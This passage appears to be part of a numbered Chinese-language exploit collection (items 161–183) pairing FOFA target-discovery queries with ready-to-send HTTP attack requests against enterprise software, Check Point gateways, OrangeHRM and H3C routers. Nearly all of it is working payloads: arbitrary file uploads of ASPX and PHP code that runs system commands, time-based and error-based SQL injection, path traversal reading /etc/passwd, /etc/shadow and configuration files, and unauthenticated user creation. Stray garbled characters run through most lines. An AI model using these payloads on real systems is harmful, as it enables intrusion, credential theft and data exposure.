8 y* T; y% ~* I+ aAccept: */*9 Q; u0 m! k4 L7 A, p( Q/ f
Accept-Language: en+ A' |% `4 |2 l0 M2 y2 B: J
Accept-Encoding: gzip
) u) N' X; p" F, r2 d$ A  G  U
4 d. g& q- w4 C: ~7 C1 _3 L% d. Q# [$ @; `2 G
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
0 l( C) Q9 F  nFOFA:body="/KT_Css/qd_defaul.css"
7 f3 q/ b- P. m- e/ @5 z第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密) I' Q' {, q' m8 A
POST /Webservice.asmx HTTP/1.1
3 E6 {8 ~  ]& D; S7 RHost: x.x.x.x+ n. m$ z- p4 n$ Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36  b4 }6 ^+ F, p
Connection: close- j% l, t) U* b% k+ N
Content-Length: 445
& n  u6 a% W- p/ _3 @1 G$ j+ d" dContent-Type: text/xml
0 }- a9 ]/ y. p; Y* n# mAccept-Encoding: gzip6 `3 a2 T& @; J; l4 G
( _8 h) g: L) y6 J' O) u
<?xml version="1.0" encoding="utf-8"?>
0 ^& u: Z7 L8 J% R$ ]8 |& W% L<soap:Envelope xmlns:xsi="# F8 B; T" b8 J6 g* F" ]. q
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"$ b2 {; f: }4 |+ u
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">; U; B" b4 A" [2 {
<soap:Body>4 W0 B5 ]) z) N) M% k1 `3 i
<UploadResume xmlns="http://tempuri.org/">
8 ?  {4 j6 |" ]+ G* V: F9 w<ip>1</ip>7 r% e" H- x  g. {: P0 v9 `5 {+ l
<fileName>../../../../dizxdell.aspx</fileName>
+ u/ h  E+ Y7 d# c1 `+ r<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>% e' e& ?- O. ?/ H
<tag>3</tag>
3 F" R! X6 M  a2 ]5 u, V</UploadResume>
  e  p7 p* w( g, ]2 _1 z9 c</soap:Body>5 d) N, S1 K% x% s  ]
</soap:Envelope>
; A5 A. D  Y3 H' C( U  e) a9 @: i* m4 I- \8 O5 _2 U
9 q. h+ T9 z! t+ z  v3 \4 S
http://x.x.x.x/dizxdell.aspx: z& M: D! `% M5 T8 S: o8 G

/ t0 v) S! _" Z: h/ v1 p162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
" |% x( e. Y! g+ X- O7 I" yFOFA: app="和丰山海-数字标牌"/ n( p7 y9 H9 O3 p9 P5 [
POST /QH.aspx HTTP/1.1
+ e. ?$ e. _% w) C$ E9 z! w3 E% `4 U) IHost: x.x.x.x3 e  z! b+ O  F" |( s. v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.04 A- B0 C% |5 T+ D8 Q1 l
Connection: close
1 k5 _* s& S) ]: @* WContent-Length: 583
! A0 _! ?  y( n) E; X: Y+ y1 EContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
3 ]  _4 a% ~5 Z1 R: ]2 jAccept-Encoding: gzip4 i4 {7 Q5 M9 g  C/ v0 }1 [+ |
9 M7 _: ]' s" A
------WebKitFormBoundaryeegvclmyurlotuey' [+ t5 @9 _4 |! {, _& m
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"# j+ \' p6 h' L$ i
Content-Type: application/octet-stream
0 P% Z  U/ E* s) p, K; j5 }8 h7 ]) e
, ?( Z& t6 N; s3 ?<% response.write("ujidwqfuuqjalgkvrpqy") %>9 W, i( k  w7 t
------WebKitFormBoundaryeegvclmyurlotuey4 E- Y) V2 x1 G/ O& S, o: `
Content-Disposition: form-data; name="action"
8 @( u) \. ?  c: }6 I
! C8 r2 K7 @, }8 \3 Mupload+ s' o: a. ?. U
------WebKitFormBoundaryeegvclmyurlotuey
. L! s( \% L" B# \6 h7 ^$ tContent-Disposition: form-data; name="responderId"
2 f- s0 B; ^% t* [3 Z
/ }6 l# ?6 y' j. @; {- E$ w' K) vResourceNewResponder- w  D6 p+ C$ [4 t" Y2 P+ B+ ^
------WebKitFormBoundaryeegvclmyurlotuey
* u. ^% V, l! PContent-Disposition: form-data; name="remotePath"4 u7 K% j1 C/ P9 G) d
7 a- b0 n- {( X
/opt/resources
' ?& w; q% I8 `2 f------WebKitFormBoundaryeegvclmyurlotuey--2 Z& m# F! K# M+ e( [/ h( I

$ @  A; a* A" g
! O% d7 {, j, g. k+ }* t( Ahttp://x.x.x.x/opt/resources/kjuhitjgk.aspx
9 k, I2 N% H) C: [+ m8 m! c. b5 V$ T+ K, Q, a
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传( h6 K$ o9 i1 t
FOFA: icon_hash="-795291075"5 j& x, _, D& ~3 }- \$ {
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1: q5 R* Q: r2 J4 ~. V
Host: x.x.x.x+ u3 g+ K; d: d% Q/ \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36( ?! m  f  `; C6 H
Connection: close2 Y. D3 k! f6 Q' [  l# _
Content-Length: 293) P7 B( F2 ~) X, t7 |
Accept: */*
) Z9 k; M4 a. p" VAccept-Encoding: gzip, deflate% e8 D) {  M; V3 I
Accept-Language: zh-CN,zh;q=0.96 s. I* V0 h, O" t& `' \
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
9 t& o9 ^& A2 m5 `# g: w
% ?% p" k7 d7 ]! Y1 L" m------iiqvnofupvhdyrcoqyuujyetjvqgocod0 d! |( _* m6 c
Content-Disposition: form-data; name="name"! |+ ^) o: P6 U) I, F

  {  P+ x" q5 D9 H" z, f9 v1.php7 j0 ~( s5 u7 \
------iiqvnofupvhdyrcoqyuujyetjvqgocod
5 F9 Q9 x. n9 FContent-Disposition: form-data; name="upfile"; filename="1.php"9 ~+ K+ `) Y( f7 X6 H
Content-Type: image/jpeg
/ F2 Y$ T$ p2 F% d8 s3 g  s! Q+ U- k
rvjhvbhwwuooyiioxega8 Y, R5 E3 k# Z2 u6 `1 e% x
------iiqvnofupvhdyrcoqyuujyetjvqgocod--# q5 J4 p7 E! M

; B0 z& g6 M# a7 Q
5 ?: _& X; V2 R3 n164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传: O  ^3 x( H& Z, j1 U5 b0 R7 Y* Z& N" n
FOFA: title="智慧综合管理平台登入"
$ @9 W+ h6 |. u, G0 ~" iPOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.15 x* y9 C7 g! a7 F
Host: x.x.x.x' t7 z7 ^1 w; H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.04 \) o$ j- }, |) b
Content-Length: 288  I7 D4 N6 q8 S4 p! p
Accept: application/json, text/javascript, */*; q=0.011 h5 A  s# d: `! S
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,8 O! b$ r* i% Z0 q$ z
Connection: close
+ L* }/ p  t6 C6 tContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
" Q! |! C% }  k. q8 l1 `X-Requested-With: XMLHttpRequest/ U  `) \7 N) w, B
Accept-Encoding: gzip7 l) {) U7 F3 H( D2 c6 F
3 p0 c- L; J0 i0 g0 @
------dqdaieopnozbkapjacdbdthlvtlyl
* H4 ^+ N0 }* T  V  G) UContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
4 {# m+ @% ]+ l$ n& w0 s7 ~5 }Content-Type: image/jpeg
9 t* `' k# m- V) H
7 n5 W9 L1 _* a3 U8 B# ~; l& I<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
4 e7 B1 ~, {- {* d3 ]$ F------dqdaieopnozbkapjacdbdthlvtlyl--
: m/ x& J4 ]" s1 c, P/ Z5 m6 ]7 M& ?
" V. l. J# Q7 I5 w/ {. j$ y
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
: G1 ], B; s+ d5 R* g$ w, |6 z5 h  m. W
165. OrangeHRM 3.3.3 SQL 注入
7 U' Z9 N% P+ }, hCVE-2024-364285 `" j( j& M' A8 l
FOFA: app="OrangeHRM-产品"4 F( n" U, M0 y2 v5 ^" f5 B2 r
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
% }5 z" K. i( @* I9 R4 x3 J' |
6 N( F. V6 V( e% E4 m; w
7 I3 K# Z* t2 @& E* D166. 中成科信票务管理平台SeatMapHandler SQL注入
8 p: e! h6 v( t3 N/ n5 K& QFOFA:body="技术支持:北京中成科信科技发展有限公司"
# ^( `( ]5 G( ~/ O/ f2 WPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
7 M1 R) A2 v, m0 dHost:
, k5 x) d: Y% r# P1 A# W0 J- P' oPragma: no-cache, C/ w- s( `. R, ~7 l7 q2 `
Cache-Control: no-cache
7 s+ R3 {( j+ w" \% CUpgrade-Insecure-Requests: 13 |" i; n3 I- ^; k/ k# r
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36# g0 r6 t, A/ ~6 U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 `" |* [- S- M- m5 VAccept-Encoding: gzip, deflate
. P' f- X0 j5 [5 ~! hAccept-Language: zh-CN,zh;q=0.9,en;q=0.8: ?' x3 n% {+ N. U0 a. u
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE2 U7 x) }) |3 q$ S: `! X8 x5 I
Connection: close
- @! \. }' i% V  IContent-Type: application/x-www-form-urlencoded
, k. R1 ?% n+ u1 TContent-Length: 89& b4 w& b6 l, z- t  z( R
  ~4 p' m5 b5 x* O6 h8 h. r
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE; I" j2 g3 n/ E/ ^

/ {0 n! s. a1 t% `7 V9 p. U& |' d1 R) Z
167. 精益价值管理系统 DownLoad.aspx任意文件读取# I% D9 m, W/ }$ {+ `% R
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"  T3 m" Y6 h2 D
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
( ~8 h; u( g, `, V5 ?Host:
% g/ b/ a0 G1 X# HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.368 W9 O0 w$ ?& G# H2 h' `
Content-Type: application/x-www-form-urlencoded+ _0 E: {" T' U
Accept-Encoding: gzip, deflate8 n: o& g) k0 X3 A
Accept: */*$ i; K/ l% k: V$ P* I
Connection: keep-alive
7 C% {1 M+ ?4 }5 B  g) c' @% i# [1 i
1 c8 N8 |" Z+ C& f9 g4 w1 O
168. 宏景EHR OutputCode 任意文件读取
7 o* r; p7 G+ N7 ?8 B5 R& Q! vFOFA:app="HJSOFT-HCM"/ [; V  z5 N( a2 G6 i6 @
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
, e! r9 t; E7 }: z$ R  CHost: your-ip* w' u4 {- E7 x" A1 D# G& C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.363 u6 S/ f* X& H5 ^
Content-Type: application/x-www-form-urlencoded9 L- c+ v# u2 N0 I5 B
Connection: close" w7 W4 |: P( y5 {2 Q# h0 O
$ T; T+ W6 ?& w/ w; Y- l! D

  ]* Y! }8 f0 G. Y, x
  Z4 r: q% m6 l+ r169. 宏景EHR downlawbase SQL注入
, {1 {# ]9 j$ E! j- dFOFA:app="HJSOFT-HCM"9 b3 Z2 {9 G: ]$ z8 R7 q/ u
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
3 v' U' y3 ~2 k+ ]8 r6 `- X) D" @$ ]( MHost: your-ip. `7 M% ?2 J7 W; G! `4 X- k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36) m4 p/ X) \% v# @4 H5 {) y& D
Accept: */*( s8 _- M! H" a* d3 l, L
Accept-Encoding: gzip, deflate
, x! O$ x% E, a1 D3 a9 i" vConnection: close) L. e) e/ J9 E: [) a

7 b) m( S1 S  ]3 F, m$ ^; L1 l# Y2 S

1 B+ s3 N7 v+ x; ?! r$ Z170. 宏景EHR DisplayExcelCustomReport 任意文件读取
; ?3 [* P9 o, v  u) WFOFA:body="/general/sys/hjaxmanage.js"
! n2 o; W8 H8 U  U4 K9 z! h$ cPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1& F1 D1 a- K' J+ m0 z9 y1 H9 i" S
Host: balalanengliang0 A) X* l1 Y* \- O+ f
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36, l% ]8 c' o8 |: C
Content-Type: application/x-www-form-urlencoded
- x5 R& A( t! f& d$ S* ^  m6 G* M& y& O
filename=../webapps/ROOT/WEB-INF/web.xml
# q" u6 K6 P& A4 G5 D7 C
. l$ p3 z# z7 O' K; ?
# d( H5 D8 [9 y171. 通天星CMSV6车载定位监控平台 SQL注入% X, u/ _8 j6 W; Y
FOFA:body="/808gps/"
9 s9 j3 [( U: X) `5 n2 YGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.17 T' |3 Z# [2 `3 \
Host: your-ip& Y  W% f8 E- _& m8 k0 Q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.00 [# _& U* @- i/ i$ l( Y) L# {
Accept: */*
# N. x* x0 {' m+ VAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ `: ^1 y7 A: z7 `* c$ H/ V) H! tAccept-Encoding: gzip, deflate
& V# W( d8 \' D; P0 h5 C  Q& kConnection: close
# G  X9 A0 r$ H
" J% U6 O  b9 f; w; }
$ I) Q! d- a2 k. f
# g3 r! n# q7 |& }$ q172. DT-高清车牌识别摄像机任意文件读取- H0 y; C4 n/ G% P4 r
FOFA:app="DT-高清车牌识别摄像机"8 x8 [3 {. j! v2 o( _
GET /../../../../etc/passwd HTTP/1.1
" C" Y5 e# @" F# A! C# cHost: your-ip/ t) d' M4 v+ A1 B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
! d. f) Q# _' |2 ?Accept-Encoding: gzip, deflate$ W. h+ E, Z3 u
Accept: */*
( K" a! I  R/ KConnection: keep-alive8 L, W, R' [& l* p- ^

1 x( [5 d- ^6 ]$ p4 K  x) H# ?3 I
8 Q. {5 e) B! V5 \/ O! P4 m9 X2 M; E0 c& T9 j( h- M
173. Check Point 安全网关任意文件读取
3 y8 [: I3 M& k5 MCVE-2024-24919% p* H* q2 |5 B0 J2 T) q+ C: Y
FOFA:app="Check_Point-SSL-Network-Extender"
0 {6 }- a# {2 G* o. @1 dPOST /clients/MyCRL HTTP/1.18 m2 p  Z# T. s( X* M/ b
Host: your-ip
" c8 q3 y0 \9 u% nContent-Type: application/x-www-form-urlencoded7 M5 j; C# I5 V& \; F

7 U* f" [) H* |6 a. a, maCSHELL/../../../../../../../etc/shadow/ m0 H& c& [5 A

  e$ j4 B  a. o6 ?/ t* s5 F" |% [; C; ?, V3 q9 |! X2 B
% ?2 @. @4 ?5 V7 [8 x% L
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
2 h$ }% {5 w. d: x- i* cFOFA:app="金和网络-金和OA". s* p% S2 }# M! k* n
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1* B1 }. G! S7 {- L6 Z
Host: your-ip
* k; A, I. U. T+ ~( O% i- b# u! qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
! R# J" Z- L+ wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% }* @( X; S3 y8 o: ^3 v
Accept-Encoding: gzip, deflate, br
2 t9 T, }" Y  B, L6 XAccept-Language: zh-CN,zh;q=0.9
/ h) U) K5 [% g/ R$ `1 E; ~! |3 b, p; }Connection: close
" S. v5 O0 m+ W
5 p3 s5 Q+ `( d! J- b8 \* y7 a! c* h; _8 p
% B# j* b2 D7 p2 c; g$ y" z+ X& y
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入; C6 R  ~3 D, N+ L
FOFA:app="金和网络-金和OA"( ?. n7 S& E8 l) s" c% Z# i
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1; D; {" r+ V; F. d$ M
Host:
2 Y+ x. w! f, C: q7 FUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36/ o! P3 h1 H7 b# x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
( R$ x: T4 ]* [- B* KAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: d( g0 P- k" t: FAccept-Encoding: gzip, deflate) i) ]" ^, c2 g* q) R
Connection: close
; l, Q+ }: y/ iUpgrade-Insecure-Requests: 1
* X. `7 J( q- ?. ~; n# S0 O) l4 G9 }/ n0 h- |
; D! e& E% I7 f
176. 电信网关配置管理系统 rewrite.php 文件上传
% v- u& Z  X1 j* pFOFA:body="img/login_bg3.png" && body="系统登录"( B: F6 X8 X: }& N9 J6 q
POST /manager/teletext/material/rewrite.php HTTP/1.19 F3 g! P( s1 T
Host: your-ip
! m4 |& ~# D  a6 m7 N9 H+ p& pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0* p  Z" o7 e, C
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
: z& g6 p+ A# i7 S$ ~: S8 {8 ?Connection: close
  T4 G/ b# K- A, @8 {2 c+ G. V; p$ S0 U4 M
------WebKitFormBoundaryOKldnDPT
' Q: t) }  D. W) M" A3 n, h2 {Content-Disposition: form-data; name="tmp_name"; filename="test.php"% x6 s1 s+ ?) i, _8 M
Content-Type: image/png8 |% z! v3 A) r% H9 x) u- b/ e: M! ?; m
7 w) {* o0 |3 ]3 R0 g0 r
<?php system("cat /etc/passwd");unlink(__FILE__);?>
; S* E  Y) u. ?' {0 ]------WebKitFormBoundaryOKldnDPT/ |& m9 \: v) V- F  t3 A4 A$ J
Content-Disposition: form-data; name="uploadtime"/ E" k- c3 @$ U# _8 a- j8 X
- d  p: |- Q5 t2 A; |% ~9 \3 B& s
/ J, x# Y4 `. D$ ^0 L5 H, F1 J( z. Y
------WebKitFormBoundaryOKldnDPT--5 k, j0 F) t7 o& [& v5 K  m  X
2 \0 U" \7 F% ]6 f3 T9 }

! }( O7 B) Z. E4 v. F1 I# A# V4 f6 k. u
: t1 X- T, `8 d, O177. H3C路由器敏感信息泄露
1 ?9 a6 _) `4 I6 o/ F' E/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg; f( Q8 D" r1 s0 x, T0 p& R: i
/userLogin.asp/../actionpolicy_status/../M60.cfg
% l* A5 z6 K/ Z) q( c8 S/userLogin.asp/../actionpolicy_status/../GR8300.cfg+ Z! n% E, {1 \! y
/userLogin.asp/../actionpolicy_status/../GR5200.cfg' t& V* e# A4 e' r. z
/userLogin.asp/../actionpolicy_status/../GR3200.cfg/ H1 C0 q* v3 M! @# L0 J1 s! c
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
( X# W. ~- K& Y( U2 ]3 E& s& X/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg/ `# G9 w/ M- b9 p
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
- W9 H3 G4 d) ?/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg" H0 ]" t% t/ N
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg7 c' c* v( Q3 e+ ^
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
' A; S8 {5 f/ M9 W; t- r/userLogin.asp/../actionpolicy_status/../ER5100.cfg- b& E' G' o: c  r
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg# y. \% A7 _. {) X, q- D! x
/userLogin.asp/../actionpolicy_status/../ER3260.cfg# ]" N" g, n! T! D
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
8 I2 q. I  b! e+ c2 X1 v2 t/userLogin.asp/../actionpolicy_status/../ER3200.cfg( a$ B  _9 Y! R3 j3 w2 v
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg1 ?# N5 v- ]  p, ~& z
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
& `0 A8 n; Y' H& u/ y) `0 V/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg* R/ V- H0 l  o- c9 P
/userLogin.asp/../actionpolicy_status/../ER3100.cfg7 j# ~; _0 ~% H# p
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg+ j$ g( i' U8 I& {3 |# U

3 h5 @# Q5 \; @$ Z; m9 `) W, {1 v7 E: Q* m* L( F
178. H3C校园网自助服务系统-flexfileupload-任意文件上传5 k4 u: r6 z/ u: z; f7 u% B% x
FOFA:header="/selfservice"" p% ]0 e! M; b1 I4 G3 E
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
$ ^+ F9 X* e+ H0 N+ nHost:
% M/ ]3 H/ |% K9 [  gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
1 [9 A6 E, F1 R+ V8 \Content-Length: 252
. c" z8 V; z' x1 ^6 D  uAccept-Encoding: gzip, deflate
4 m" L: E6 `$ ^* C" M8 z% \Connection: close
) R8 a/ s/ m- f# [' vContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
5 h, l. C4 [, t( b; [-----------------aqutkea7vvanpqy3rh2l
% K, V, @, b# M$ ^Content-Disposition: form-data; name="12234.txt"; filename="12234"
1 w, _/ @4 B$ eContent-Type: application/octet-stream
6 {  ^+ i; \% E- P- \2 |( N$ Z6 R4 KContent-Length: 2557 _; X( W' F% E4 o: T; r" D6 y6 ~
* z, }& i; d, w6 `* H$ S
12234
7 @+ g- [7 d( t" ~  F6 [: _+ Y8 @5 e-----------------aqutkea7vvanpqy3rh2l--4 d' m' U' T/ P+ {) M0 ~# `

! S, U0 T' Z; a% @5 a, z) y9 m9 e; p8 z8 U$ x
GET /imc/primepush/%2e%2e/flex/12234.txt
7 `8 w3 [6 W9 \" r
  q0 B" v7 h/ A$ l2 f: @9 x$ y# w
6 \5 ~2 n1 d% x+ m179. 建文工程管理系统存在任意文件读取# @: m/ x8 v/ J! F2 z+ q' x
POST /Common/DownLoad2.aspx HTTP/1.1
" K2 |& m8 I5 J" ^! L! XHost: {{Hostname}}, Q& o. B! n3 X# h- U
Content-Type: application/x-www-form-urlencoded' M7 G4 ~% ]  r
User-Agent: Mozilla/5.03 S, f; b: N) q/ H9 ]# a

, {2 `# o5 v5 `: j0 y% wpath=../log4net.config&Name=4 S: y% A/ N$ q) {( V
+ T5 T! {: F' n& I
% M6 k/ I6 G$ d  m3 Q
180. 帮管客 CRM jiliyu SQL注入$ ^* s* U: G# J6 ]4 F, ~& F0 ^+ g
FOFA:app="帮管客-CRM"* e5 g: w2 A$ g' C0 K  i! t' t
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
4 E# x/ @7 T$ \- d7 s0 ~0 YHost: your-ip
6 J/ O- Y3 x. ?6 fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.362 ~# z/ s( p2 L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, s2 T  a, c, v) p( ?2 S. u& _Accept-Encoding: gzip, deflate- }$ H/ M4 w2 F1 x) v
Accept-Language: zh-CN,zh;q=0.97 k: d# c# t$ o  S$ N
Connection: close
, d; c; ~4 n4 A/ t" f' c, t: P3 A2 ?/ A4 X; X
/ Y' b- E$ Q& F  Z, J+ J/ \6 w; r
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入6 O4 U6 N9 R5 ^: Q; [" ]2 O3 j
FOFA:"PDCA/js/_publicCom.js"6 G  Y- P, T# L7 ?, F1 u5 R! o
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1' ^' Z9 T9 @6 b4 M3 Y
Host: your-ip
/ q9 s5 r1 E& @# X( d! `/ ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36& W. }( s8 Y# f1 ]; i# g5 u
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" j7 w/ _8 y8 t- G  u1 X: B
Accept-Encoding: gzip, deflate, br5 W5 U' A- N" L
Accept-Language: zh-CN,zh;q=0.9
! |4 Y9 ]6 }& R' ~# V; o5 W% @Connection: close
; u  D" y' y- k1 cContent-Type: application/x-www-form-urlencoded
* P5 K7 F# O3 r/ [; u* t! G: n+ v) G+ E, ]) {$ c2 \7 m

9 F! _0 G" Y6 b3 K( N6 e; Laction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20) e( R0 I: p1 v! ^$ N: j
" b# G7 S# E% \% S. a
; O2 a2 F# S5 ~, {
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
3 |& s0 ^4 }; _( s/ YFOFA:"PDCA/js/_publicCom.js"
! i) n6 n) E3 `" @POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
$ v7 n3 @4 z  K2 D- E# }. w- w1 b, ]Host: your-ip
& I& k0 g- @/ g& ~0 e) nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
+ u7 q; M/ |! u& E3 I6 |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.75 b8 ^3 q( G4 w# C, ^
Accept-Encoding: gzip, deflate, br
) _; f3 ~3 H5 |Accept-Language: zh-CN,zh;q=0.99 _  R9 @8 G. [- R6 X2 y5 T8 n% U9 d/ ~% a
Connection: close# x$ p3 n- l2 Z1 O, H
Content-Type: application/x-www-form-urlencoded
) T: c( Y( ~, l7 S! r7 o/ i0 k$ D: R8 ?; s/ K) U
: [# t' w+ c" A3 ?
username=test1234&pwd=test1234&savedays=15 R: V* ]5 _+ h9 r2 l# t
1 g- ~6 F$ {+ k' U' U8 N

. d- ^) \0 x6 ~183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
) X+ h6 q* x  n9 w; UFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
9 j) F$ ~# q1 t& PGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1. t0 G0 k6 `7 O1 ?7 n
Host: your-ip6 c+ f& {  s5 C3 n
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
. m' Z8 H( J0 }2 hAccept-Charset: utf-8
$ D$ b5 ~# I: k& l8 @' {Accept-Encoding: gzip, deflate4 r- k: o; O; [9 B0 c' O/ u7 X& m
Connection: close
